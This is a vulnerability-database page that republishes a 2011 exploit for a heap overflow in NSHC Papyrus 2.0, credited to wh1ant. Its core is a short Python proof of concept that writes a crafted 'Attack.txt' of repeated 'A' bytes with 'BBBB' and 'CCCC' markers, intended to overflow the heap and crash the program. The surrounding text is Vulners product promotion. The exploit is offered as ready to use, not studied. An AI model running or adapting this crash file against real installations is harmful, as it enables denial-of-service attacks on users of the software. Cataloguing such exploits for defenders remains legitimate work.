Lucene search
K

NSHC Papyrus Heap Overflow Vulnerability

🗓️ 13 Aug 2011 00:00:00Reported by wh1antType 
zdt
 zdt
🔗 0day.today👁 23 Views

NSHC Papyrus Heap Overflow Vulnerability in PapyrusSetup.exe 2.

Code
#!/usr/bin/python
#
# Exploit Title: NSHC Papyrus Heap Overflow Vulnerability
# Date: 13\08\2011
# Author: wh1ant
# Vendor or Software Link: Link: http://file.atfile.com/ftp/data/03/PapyrusSetup.exe
# Version: 2.0
# Category: dos
# Tested on: windows XP SP3 South Korea / windows XP SP3 English VMware Workstation

# Notice:
# Encrypt/Decrypt programs that are created by NSHC
#

fd = open("Attack.txt", "w")

data = 'A'
for i in range(0, 1003):
	fd.write(data)

fd.write("BBBB");
fd.write("CCCC");

for i in range(0, 2000):
	fd.write(data);

fd.close()



#  0day.today [2018-01-08]  #

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

13 Aug 2011 00:00Current
7High risk
Vulners AI Score7
23